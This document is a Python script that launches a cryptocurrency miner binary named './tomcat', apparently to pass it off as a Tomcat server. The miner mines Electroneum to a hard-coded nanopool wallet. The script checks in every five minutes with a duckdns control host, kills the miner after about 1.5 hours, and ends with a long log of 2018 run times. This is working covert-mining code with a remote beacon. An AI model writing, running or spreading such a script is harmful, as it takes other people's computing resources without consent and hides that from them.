import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:49:01.698821
#2018-02-17 16:35:05.073502
#2018-02-17 18:22:06.543443
#2018-02-17 20:10:07.697107
#2018-02-17 21:57:07.415845
#2018-02-17 23:42:05.267528
#2018-02-18 01:32:01.372643
#2018-02-18 03:18:04.011910
#2018-02-18 05:07:05.286814
#2018-02-18 06:58:05.911108
#2018-02-18 08:48:01.746910
#2018-02-18 10:35:03.631806
#2018-02-18 12:20:05.886569
#2018-02-18 14:07:06.363031
#2018-02-18 15:56:01.426865
#2018-02-18 17:45:09.044615
#2018-02-18 19:35:05.474888
#2018-02-18 21:20:09.007822
#2018-02-18 23:09:05.857027
#2018-02-19 00:56:05.111538
#2018-02-19 02:43:04.744236
#2018-02-19 04:30:07.088869
#2018-02-19 06:15:08.381099
#2018-02-19 08:03:01.550046
#2018-02-19 09:53:04.070219
#2018-02-19 11:42:05.433717
#2018-02-19 13:29:03.942342
#2018-02-19 15:18:09.461476
#2018-02-19 17:06:09.065566
#2018-02-19 18:56:08.075574
#2018-02-19 20:43:05.548526
#2018-02-19 22:31:01.337424
#2018-02-20 00:16:01.829376
#2018-02-20 02:03:01.832480
#2018-02-20 03:53:06.113138
#2018-02-20 05:37:03.882079
#2018-02-20 07:22:01.947867
#2018-02-20 09:07:06.334303
#2018-02-20 10:50:05.967230
#2018-02-20 12:37:07.407042
#2018-02-20 14:22:03.895372
#2018-02-20 16:06:06.473950
#2018-02-20 17:52:01.551844
#2018-02-20 19:44:07.853460
#2018-02-20 21:33:01.474978
#2018-02-20 23:15:09.508431
#2018-02-21 01:01:01.888180
#2018-02-21 02:48:07.281890
#2018-02-21 04:36:05.673929
#2018-02-21 06:24:01.876726
#2018-02-21 08:09:05.597389
#2018-02-21 09:54:06.031577
#2018-02-21 11:43:02.152685
#2018-02-21 13:33:05.804905
#2018-02-21 15:17:05.737917
#2018-02-21 17:07:08.883475
#2018-02-21 18:53:05.944203
#2018-02-21 20:43:04.337700
#2018-02-21 22:27:05.824514
#2018-02-22 00:17:09.024244
#2018-02-22 02:06:01.548298
#2018-02-22 03:51:08.175760
#2018-02-22 05:39:05.020427
#2018-02-22 07:24:03.948740
#2018-02-22 09:11:08.039436
#2018-02-22 10:59:05.840653
#2018-02-22 12:44:01.532111
#2018-02-22 14:29:05.419812
#2018-02-22 16:15:10.946617
#2018-02-22 18:03:07.280133
#2018-02-22 19:51:06.479580
#2018-02-22 21:40:06.239379
#2018-02-22 23:27:07.340375
#2018-02-23 01:14:05.510739
#2018-02-23 03:01:05.063271
#2018-02-23 04:47:02.111458
#2018-02-23 06:30:08.254875
#2018-02-23 08:17:07.065414
#2018-02-23 10:36:01.816732
#2018-02-23 12:31:02.141390
#2018-02-23 14:18:01.927990
#2018-02-23 16:08:04.894881
#2018-02-23 17:55:04.216884
#2018-02-23 19:42:01.975496
#2018-02-23 21:25:01.351796
#2018-02-23 23:13:04.170639
#2018-02-24 01:03:04.993203
#2018-02-24 02:56:06.490841
#2018-02-24 04:44:05.111533
#2018-02-24 06:28:06.405003
#2018-02-24 08:17:06.852274
#2018-02-24 10:02:07.011277
#2018-02-24 12:00:11.238641
#2018-02-24 13:48:06.271561
#2018-02-24 15:37:01.902658
#2018-02-24 17:32:01.270002
#2018-02-24 19:18:08.226957
#2018-02-24 21:07:01.957247
#2018-02-25 01:12:01.673211
#2018-02-25 04:58:03.405928
#2018-02-25 09:26:01.207275